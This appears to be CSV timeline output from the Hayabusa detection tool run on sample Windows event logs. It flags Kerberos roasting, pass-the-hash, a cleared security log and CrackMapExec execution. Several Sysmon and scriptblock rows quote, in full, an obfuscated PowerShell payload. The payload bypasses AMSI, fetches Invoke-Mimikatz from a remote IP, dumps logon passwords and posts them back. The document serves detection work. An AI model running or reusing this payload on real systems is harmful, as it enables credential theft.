Service Ticket Requested,User: Bob@LABCORP.LOCAL | Svc: DC-SERVER-1$ | IP Addr: ::ffff:192.168.1.2 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 07:56:26.435 +00:00,DC-Server-1.labcorp.local,4672,info,,Admin Logon,User: Bob | LID: 0xc66373,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 07:56:26.436 +00:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: Bob | Computer: | IP Addr: 192.168.1.2 | LID: 0xc66373,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 07:56:26.681 +00:00,DC-Server-1.labcorp.local,4769,info,,Kerberos Service Ticket Requested,User: Bob@LABCORP.LOCAL | Svc: DC-SERVER-1$ | IP Addr: ::ffff:192.168.1.2 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 07:56:26.683 +00:00,DC-Server-1.labcorp.local,4672,info,,Admin Logon,User: Bob | LID: 0xc66389,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 07:56:26.683 +00:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: Bob | Computer: | IP Addr: 192.168.1.2 | LID: 0xc66389,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 07:56:26.869 +00:00,DC-Server-1.labcorp.local,4768,medium,CredAccess,Possible AS-REP Roasting,Possible AS-REP Roasting,rules/hayabusa/default/alerts/Security/4768_KerberosTGT-Request_AS-REP-Roasting.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 07:56:26.869 +00:00,DC-Server-1.labcorp.local,4768,info,,Kerberos TGT Requested,User: Alice | Svc: krbtgt | IP Addr: ::ffff:192.168.1.2 | Status: 0x0 | PreAuthType: 0,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 07:56:26.980 +00:00,DC-Server-1.labcorp.local,4634,info,,Logoff,User: Bob | LID: 0xc66389,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 07:58:02.652 +00:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: DC-SERVER-1$ | Computer: | IP Addr: fe80::e50e:b89e:4718:3aa | LID: 0xc712f1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 07:58:02.666 +00:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: DC-SERVER-1$ | Computer: | IP Addr: 192.168.1.100 | LID: 0xc7142b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 07:58:02.761 +00:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: DC-SERVER-1$ | Computer: | IP Addr: fe80::e50e:b89e:4718:3aa | LID: 0xc714d9,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 07:58:28.422 +00:00,DC-Server-1.labcorp.local,4769,info,,Kerberos Service Ticket Requested,User: DC-SERVER-1$@LABCORP.LOCAL | Svc: DC-SERVER-1$ | IP Addr: ::1 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 07:58:28.425 +00:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: DC-SERVER-1$ | Computer: | IP Addr: fe80::e50e:b89e:4718:3aa | LID: 0xc7313f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 07:59:42.537 +00:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: DC-SERVER-1$ | Computer: | IP Addr: fe80::e50e:b89e:4718:3aa | LID: 0xc7adb8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 07:59:42.545 +00:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: DC-SERVER-1$ | Computer: | IP Addr: fe80::e50e:b89e:4718:3aa | LID: 0xc7ae25,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 09:23:54.244 +00:00,DC-Server-1.labcorp.local,1102,high,Evas,Security Log Cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx +2021-04-29 09:23:58.690 +00:00,DC-Server-1.labcorp.local,4776,info,,NTLM Logon To Local Account,User: Alice | Computer: | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx +2021-04-29 09:23:58.691 +00:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: Alice | Computer: | IP Addr: 192.168.1.200 | LID: 0x27d676,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx +2021-04-29 09:23:58.691 +00:00,DC-Server-1.labcorp.local,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx +2021-04-29 09:23:58.718 +00:00,DC-Server-1.labcorp.local,4768,medium,CredAccess,Possible Kerberoasting,Possible Kerberoasting Risk Activity.,rules/hayabusa/default/alerts/Security/4768_KerberosTGT-Request_Kerberoasting.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx +2021-04-29 09:23:58.718 +00:00,DC-Server-1.labcorp.local,4768,info,,Kerberos TGT Requested,User: Alice | Svc: krbtgt | IP Addr: ::ffff:192.168.1.200 | Status: 0x0 | PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx +2021-04-29 09:23:58.726 +00:00,DC-Server-1.labcorp.local,4769,info,,Kerberos Service Ticket Requested,User: Alice@LABCORP.LOCAL | Svc: sql101 | IP Addr: ::ffff:192.168.1.200 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx +2021-04-29 09:23:58.735 +00:00,DC-Server-1.labcorp.local,4634,info,,Logoff,User: Alice | LID: 0x27d676,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx +2021-04-30 20:27:39.761 +00:00,win10-02.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "" -JOIN('91A78H101@116f46G83@101S114H118@105k99T101@80S111k105T110k116T77,97@110T97S103A101H114A93S58k58,83@101A114@118k101@114G67,101T114S116S105@102,105,99G97@116A101S86A97A108H105@100G97H116@105A111,110@67T97T108k108S98@97f99T107@32@61S32k123T36@116G114H117G101f125S10,116f114,121A123A10A91k82S101S102T93f46,65@115H115H101S109H98H108,121,46f71@101@116T84f121G112@101T40@39,83k121f115S39,43G39A116@101,109k46,77T97A110@39A43f39f97S103H101k109T101G110G116S46k65@117A116A39k43@39S111f109k97@116@105f111T110f46@65S109A39T43,39@115,105f85G116@39G43G39T105@108@115@39T41,46A71S101H116S70@105@101A108T100S40f39k97A109@39H43G39T115T105,73T110S105S39@43@39f116f70H97@105@108A101@100T39@44@32H39@78S111f110G80@39A43@39H117H98k108G105H99S44@83@116T97T39G43S39S116A105@99,39H41H46T83S101S116k86T97A108,117H101@40f36,110A117k108A108@44k32@36@116f114T117@101G41G10,125,99f97H116A99@104H123f125,10H91T78T101f116k46A83f101S114f118S105,99,101A80k111f105G110f116f77S97A110k97@103T101,114@93S58k58T83H101H114G118,101@114@67G101@114A116@105G102H105k99G97S116T101@86S97f108k105k100H97G116S105,111k110k67k97T108@108,98S97@99@107A32H61,32,123@36H116f114k117,101k125@10,91@83f121k115S116@101@109S46H78G101A116S46@83S101A114T118T105@99H101@80H111G105f110,116f77H97f110S97@103,101f114H93A58f58A83@101k99@117G114,105@116@121@80S114A111,116A111f99k111k108@32@61@32H91k83T121,115@116f101H109T46@78@101@116T46G83k101,99f117@114k105k116@121f80H114T111A116f111G99G111@108A84S121H112G101@93G39A83A115k108H51@44,84T108G115k44k84T108A115T49A49@44@84G108@115@49S50@39@10S73k69T88G32f40@78A101@119@45f79,98H106@101S99k116k32G78,101A116@46@87@101k98G67S108G105,101@110G116G41G46@68S111@119f110H108H111,97@100@83H116@114H105@110@103k40H39A104A116H116A112S115A58G47f47S49H48T46A50H51,46k49H50H51k46H49k49H58H52A52f51f47@73@110S118f111@107k101G45S77@105T109@105,107,97,116H122H46k112A115k49T39@41T10T36S99@109T100S32,61S32f73H110H118H111T107,101@45H77@105f109,105@107k97@116@122T32,45k67H111H109H109@97S110k100S32S39T112k114,105f118k105,108G101T103A101,58H58A100A101S98S117,103S32@115@101H107@117@114A108k115,97f58,58f108S111H103S111A110,112H97f115H115G119@111G114@100f115@32S101f120f105k116G39,10G36G114H101f113k117,101S115G116@32@61,32A91A83T121T115k116k101G109G46H78H101S116@46H87k101T98G82S101S113@117A101@115k116H93@58S58@67T114,101T97H116S101@40k39T104f116k116k112k115S58,47f47@49G48@46,50k51G46@49G50,51H46@49@49A58H52H52,51@47@39k41A10H36S114H101A113,117@101@115k116@46,77,101H116@104G111k100S32@61A32S39S80G79k83k84k39T10H36@114k101,113T117H101H115@116,46,67H111T110@116S101@110G116T84@121S112,101k32G61H32T39H97,112G112,108T105f99k97f116k105f111@110T47@120G45,119H119S119S45T102S111,114H109A45f117G114f108f101H110H99H111k100f101k100T39@10,36A98@121G116f101@115f32T61T32G91H83A121S115G116,101,109T46k84G101f120T116S46T69A110G99T111k100,105S110k103@93@58T58S65T83S67S73G73G46A71A101G116f66k121f116@101H115T40,36,99T109@100S41k10@36A114H101f113@117H101H115H116G46G67A111,110@116,101f110,116T76A101H110f103f116@104@32,61S32S36@98T121H116G101,115f46A76@101f110A103f116H104A10@36G114G101G113A117f101H115k116k83,116f114G101T97k109A32S61T32f36H114@101,113f117@101f115S116H46f71f101G116,82S101T113f117,101,115S116,83,116T114H101k97f109T40S41,10T36S114H101G113H117S101f115H116H83@116A114G101G97H109G46f87k114k105H116G101T40A36f98f121@116H101k115T44@32S48S44k32,36,98k121G116@101@115T46G76@101H110,103G116A104,41H10k36T114G101G113A117@101@115@116T83k116A114k101T97H109A46H67S108S111A115A101k40T41T10H36k114S101@113f117T101@115S116S46f71@101f116,82f101f115@112T111k110@115S101k40@41'.sPlIT('@A@GkTfSH,' )|%%{([iNt] $_ -AS [char])})| .( $ENv:comsPec[4,26,25]-JOIn'')"" | Process: C:\Windows\System32\cmd.exe | User: OFFSEC\admmig | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x36df3b7 | PID: 7728 | PGUID: 9828DA72-683B-608C-A30C-000000000C00 | Hash: SHA1=F1EFB0FDDC156E4C61C5F78A54700E4E7984D55D,MD5=8A2122E8162DBEF04694B9C3E0B6CDEE,SHA256=B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450,IMPHASH=272245E2988E1E430500B852C4FB5E18",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx +2021-04-30 20:27:39.761 +00:00,win10-02.offsec.lan,1,high,Exec,Suspicious PowerShell Parent Process,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx +2021-04-30 20:27:39.761 +00:00,win10-02.offsec.lan,1,high,Exec | Evas,CrackMapExec PowerShell Obfuscation,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_crackmapexec_powershell_obfuscation.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx +2021-04-30 20:27:39.761 +00:00,win10-02.offsec.lan,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation_sysmon/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx +2021-04-30 20:27:39.761 +00:00,win10-02.offsec.lan,1,medium,Exec,Change PowerShell Policies to an Unsecure Level,,rules/sigma/process_creation_sysmon/proc_creation_win_set_policies_to_unsecure_level.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx +2021-04-30 20:27:39.761 +00:00,win10-02.offsec.lan,1,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation_sysmon/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx +2021-04-30 20:27:39.911 +00:00,win10-02.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | Cmd: powershell.exe -exec bypass -noni -nop -w 1 -C "" -JOIN('91A78H101@116f46G83@101S114H118@105k99T101@80S111k105T110k116T77,97@110T97S103A101H114A93S58k58,83@101A114@118k101@114G67,101T114S116S105@102,105,99G97@116A101S86A97A108H105@100G97H116@105A111,110@67T97T108k108S98@97f99T107@32@61S32k123T36@116G114H117G101f125S10,116f114,121A123A10A91k82S101S102T93f46,65@115H115H101S109H98H108,121,46f71@101@116T84f121G112@101T40@39,83k121f115S39,43G39A116@101,109k46,77T97A110@39A43f39f97S103H101k109T101G110G116S46k65@117A116A39k43@39S111f109k97@116@105f111T110f46@65S109A39T43,39@115,105f85G116@39G43G39T105@108@115@39T41,46A71S101H116S70@105@101A108T100S40f39k97A109@39H43G39T115T105,73T110S105S39@43@39f116f70H97@105@108A101@100T39@44@32H39@78S111f110G80@39A43@39H117H98k108G105H99S44@83@116T97T39G43S39S116A105@99,39H41H46T83S101S116k86T97A108,117H101@40f36,110A117k108A108@44k32@36@116f114T117@101G41G10,125,99f97H116A99@104H123f125,10H91T78T101f116k46A83f101S114f118S105,99,101A80k111f105G110f116f77S97A110k97@103T101,114@93S58k58T83H101H114G118,101@114@67G101@114A116@105G102H105k99G97S116T101@86S97f108k105k100H97G116S105,111k110k67k97T108@108,98S97@99@107A32H61,32,123@36H116f114k117,101k125@10,91@83f121k115S116@101@109S46H78G101A116S46@83S101A114T118T105@99H101@80H111G105f110,116f77H97f110S97@103,101f114H93A58f58A83@101k99@117G114,105@116@121@80S114A111,116A111f99k111k108@32@61@32H91k83T121,115@116f101H109T46@78@101@116T46G83k101,99f117@114k105k116@121f80H114T111A116f111G99G111@108A84S121H112G101@93G39A83A115k108H51@44,84T108G115k44k84T108A115T49A49@44@84G108@115@49S50@39@10S73k69T88G32f40@78A101@119@45f79,98H106@101S99k116k32G78,101A116@46@87@101k98G67S108G105,101@110G116G41G46@68S111@119f110H108H111,97@100@83H116@114H105@110@103k40H39A104A116H116A112S115A58G47f47S49H48T46A50H51,46k49H50H51k46H49k49H58H52A52f51f47@73@110S118f111@107k101G45S77@105T109@105,107,97,116H122H46k112A115k49T39@41T10T36S99@109T100S32,61S32f73H110H118H111T107,101@45H77@105f109,105@107k97@116@122T32,45k67H111H109H109@97S110k100S32S39T112k114,105f118k105,108G101T103A101,58H58A100A101S98S117,103S32@115@101H107@117@114A108k115,97f58,58f108S111H103S111A110,112H97f115H115G119@111G114@100f115@32S101f120f105k116G39,10G36G114H101f113k117,101S115G116@32@61,32A91A83T121T115k116k101G109G46H78H101S116@46H87k101T98G82S101S113@117A101@115k116H93@58S58@67T114,101T97H116S101@40k39T104f116k116k112k115S58,47f47@49G48@46,50k51G46@49G50,51H46@49@49A58H52H52,51@47@39k41A10H36S114H101A113,117@101@115k116@46,77,101H116@104G111k100S32@61A32S39S80G79k83k84k39T10H36@114k101,113T117H101H115@116,46,67H111T110@116S101@110G116T84@121S112,101k32G61H32T39H97,112G112,108T105f99k97f116k105f111@110T47@120G45,119H119S119S45T102S111,114H109A45f117G114f108f101H110H99H111k100f101k100T39@10,36A98@121G116f101@115f32T61T32G91H83A121S115G116,101,109T46k84G101f120T116S46T69A110G99T111k100,105S110k103@93@58T58S65T83S67S73G73G46A71A101G116f66k121f116@101H115T40,36,99T109@100S41k10@36A114H101f113@117H101H115H116G46G67A111,110@116,101f110,116T76A101H110f103f116@104@32,61S32S36@98T121H116G101,115f46A76@101f110A103f116H104A10@36G114G101G113A117f101H115k116k83,116f114G101T97k109A32S61T32f36H114@101,113f117@101f115S116H46f71f101G116,82S101T113f117,101,115S116,83,116T114H101k97f109T40S41,10T36S114H101G113H117S101f115H116H83@116A114G101G97H109G46f87k114k105H116G101T40A36f98f121@116H101k115T44@32S48S44k32,36,98k121G116@101@115T46G76@101H110,103G116A104,41H10k36T114G101G113A117@101@115@116T83k116A114k101T97H109A46H67S108S111A115A101k40T41T10H36k114S101@113f117T101@115S116S46f71@101f116,82f101f115@112T111k110@115S101k40@41'.sPlIT('@A@GkTfSH,' )|%%{([iNt] $_ -AS [char])})| .( $ENv:comsPec[4,26,25]-JOIn'')"" | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: OFFSEC\admmig | Parent Cmd: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "" -JOIN('91A78H101@116f46G83@101S114H118@105k99T101@80S111k105T110k116T77,97@110T97S103A101H114A93S58k58,83@101A114@118k101@114G67,101T114S116S105@102,105,99G97@116A101S86A97A108H105@100G97H116@105A111,110@67T97T108k108S98@97f99T107@32@61S32k123T36@116G114H117G101f125S10,116f114,121A123A10A91k82S101S102T93f46,65@115H115H101S109H98H108,121,46f71@101@116T84f121G112@101T40@39,83k121f115S39,43G39A116@101,109k46,77T97A110@39A43f39f97S103H101k109T101G110G116S46k65@117A116A39k43@39S111f109k97@116@105f111T110f46@65S109A39T43,39@115,105f85G116@39G43G39T105@108@115@39T41,46A71S101H116S70@105@101A108T100S40f39k97A109@39H43G39T115T105,73T110S105S39@43@39f116f70H97@105@108A101@100T39@44@32H39@78S111f110G80@39A43@39H117H98k108G105H99S44@83@116T97T39G43S39S116A105@99,39H41H46T83S101S116k86T97A108,117H101@40f36,110A117k108A108@44k32@36@116f114T117@101G41G10,125,99f97H116A99@104H123f125,10H91T78T101f116k46A83f101S114f118S105,99,101A80k111f105G110f116f77S97A110k97@103T101,114@93S58k58T83H101H114G118,101@114@67G101@114A116@105G102H105k99G97S116T101@86S97f108k105k100H97G116S105,111k110k67k97T108@108,98S97@99@107A32H61,32,123@36H116f114k117,101k125@10,91@83f121k115S116@101@109S46H78G101A116S46@83S101A114T118T105@99H101@80H111G105f110,116f77H97f110S97@103,101f114H93A58f58A83@101k99@117G114,105@116@121@80S114A111,116A111f99k111k108@32@61@32H91k83T121,115@116f101H109T46@78@101@116T46G83k101,99f117@114k105k116@121f80H114T111A116f111G99G111@108A84S121H112G101@93G39A83A115k108H51@44,84T108G115k44k84T108A115T49A49@44@84G108@115@49S50@39@10S73k69T88G32f40@78A101@119@45f79,98H106@101S99k116k32G78,101A116@46@87@101k98G67S108G105,101@110G116G41G46@68S111@119f110H108H111,97@100@83H116@114H105@110@103k40H39A104A116H116A112S115A58G47f47S49H48T46A50H51,46k49H50H51k46H49k49H58H52A52f51f47@73@110S118f111@107k101G45S77@105T109@105,107,97,116H122H46k112A115k49T39@41T10T36S99@109T100S32,61S32f73H110H118H111T107,101@45H77@105f109,105@107k97@116@122T32,45k67H111H109H109@97S110k100S32S39T112k114,105f118k105,108G101T103A101,58H58A100A101S98S117,103S32@115@101H107@117@114A108k115,97f58,58f108S111H103S111A110,112H97f115H115G119@111G114@100f115@32S101f120f105k116G39,10G36G114H101f113k117,101S115G116@32@61,32A91A83T121T115k116k101G109G46H78H101S116@46H87k101T98G82S101S113@117A101@115k116H93@58S58@67T114,101T97H116S101@40k39T104f116k116k112k115S58,47f47@49G48@46,50k51G46@49G50,51H46@49@49A58H52H52,51@47@39k41A10H36S114H101A113,117@101@115k116@46,77,101H116@104G111k100S32@61A32S39S80G79k83k84k39T10H36@114k101,113T117H101H115@116,46,67H111T110@116S101@110G116T84@121S112,101k32G61H32T39H97,112G112,108T105f99k97f116k105f111@110T47@120G45,119H119S119S45T102S111,114H109A45f117G114f108f101H110H99H111k100f101k100T39@10,36A98@121G116f101@115f32T61T32G91H83A121S115G116,101,109T46k84G101f120T116S46T69A110G99T111k100,105S110k103@93@58T58S65T83S67S73G73G46A71A101G116f66k121f116@101H115T40,36,99T109@100S41k10@36A114H101f113@117H101H115H116G46G67A111,110@116,101f110,116T76A101H110f103f116@104@32,61S32S36@98T121H116G101,115f46A76@101f110A103f116H104A10@36G114G101G113A117f101H115k116k83,116f114G101T97k109A32S61T32f36H114@101,113f117@101f115S116H46f71f101G116,82S101T113f117,101,115S116,83,116T114H101k97f109T40S41,10T36S114H101G113H117S101f115H116H83@116A114G101G97H109G46f87k114k105H116G101T40A36f98f121@116H101k115T44@32S48S44k32,36,98k121G116@101@115T46G76@101H110,103G116A104,41H10k36T114G101G113A117@101@115@116T83k116A114k101T97H109A46H67S108S111A115A101k40T41T10H36k114S101@113f117T101@115S116S46f71@101f116,82f101f115@112T111k110@115S101k40@41'.sPlIT('@A@GkTfSH,' )|%{([iNt] $_ -AS [char])})| .( $ENv:comsPec[4,26,25]-JOIn'')"" | LID: 0x36df3b7 | PID: 4436 | PGUID: 9828DA72-683B-608C-A50C-000000000C00 | Hash: SHA1=F43D9BB316E30AE1A3494AC5B0624F6BEA1BF054,MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx +2021-04-30 20:27:39.911 +00:00,win10-02.offsec.lan,1,medium,Evas | Exec,Encoded PowerShell Command Line,,rules/sigma/process_creation_sysmon/proc_creation_win_powershell_cmdline_specific_comb_methods.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx +2021-04-30 20:27:39.911 +00:00,win10-02.offsec.lan,1,high,Exec | Evas,CrackMapExec PowerShell Obfuscation,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_crackmapexec_powershell_obfuscation.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx +2021-04-30 20:27:39.911 +00:00,win10-02.offsec.lan,1,medium,Exec,Change PowerShell Policies to an Unsecure Level,,rules/sigma/process_creation_sysmon/proc_creation_win_set_policies_to_unsecure_level.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx +2021-04-30 20:27:39.911 +00:00,win10-02.offsec.lan,1,high,Exec,Suspicious PowerShell Parameter Substring,,rules/sigma/process_creation_sysmon/proc_creation_win_powershell_suspicious_parameter_variation.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx +2021-04-30 20:27:39.911 +00:00,win10-02.offsec.lan,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_sysmon/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx +2021-04-30 20:27:39.911 +00:00,win10-02.offsec.lan,1,medium,Evas,Suspicious XOR Encoded PowerShell Command Line,,rules/sigma/process_creation_sysmon/proc_creation_win_powershell_xor_commandline.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx +2021-04-30 20:27:39.911 +00:00,win10-02.offsec.lan,1,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation_sysmon/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx +2021-04-30 20:32:55.804 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,". ( $PsHoME[4]+$PsHoME[34]+'X')( $(Sv 'Ofs' '' ) +[StriNG]('91A78}101d116,46t83d101A114d118A105A99A101W80N111N105N110N116d77}97A110z97}103z101A114N93,58A58N83d101}114}118t101t114}67A101t114A116N105W102}105,99A97t116}101,86}97}108W105W100z97}116,105}111}110W67,97N108A108}98}97}99A107,32A61t32N123t36}116,114A117}101A125N10A116A114A121}123}10}91}82W101W102A93A46d65}115,115}101d109t98,108t121t46}71z101N116N84t121z112d101d40t39z83N121d115z39}43z39t116N101A109d46}77d97d110N39A43z39W97d103W101W109t101}110N116W46d65A117z116z39W43d39}111d109A97z116}105A111z110z46W65A109}39z43A39}115t105}85t116}39N43z39d105A108A115t39z41N46W71W101}116z70d105N101A108t100,40}39,97}109d39A43W39z115}105}73d110}105}39d43t39A116t70t97N105N108}101d100A39z44z32N39W78A111A110z80W39z43d39,117t98N108}105t99}44N83,116W97}39}43A39}116W105,99W39}41z46A83N101,116z86d97}108t117N101z40A36N110d117A108A108z44N32}36}116}114,117A101N41W10,125,99}97A116A99,104d123t125A10}91t78t101}116,46,83d101W114z118}105N99A101d80A111,105t110}116W77,97N110d97,103A101}114W93}58t58}83A101d114z118t101A114A67N101W114d116,105N102d105N99}97,116W101z86t97}108}105A100A97,116z105A111z110}67W97d108d108}98}97z99,107N32N61,32,123}36d116t114}117}101N125}10N91A83}121,115A116}101z109A46}78}101W116N46A83}101,114,118,105}99N101,80,111A105z110A116A77A97,110N97t103t101t114}93}58d58t83N101t99,117d114z105A116d121,80}114,111}116,111}99A111W108W32}61A32W91W83z121W115}116t101}109d46}78A101t116N46t83N101A99}117d114W105d116A121}80d114W111t116z111}99d111z108}84z121N112z101,93A39,83A115z108,51d44W84}108z115A44N84A108t115A49W49N44,84}108}115N49d50,39W10t73t69t88W32}40A78A101A119A45A79d98d106t101z99}116A32W78}101W116t46}87,101N98A67,108A105d101}110d116,41A46z68d111N119N110z108A111}97A100z83t116A114A105A110,103,40A39d104d116N116N112A115t58A47N47z49}48z46,50}51A46}49d50t51N46}49A49A58N52}52}51W47}73W110A118}111A107}101N45t77}105A109}105,107W97t116z122z46,112t115}49A39,41d10t36d99t109z100t3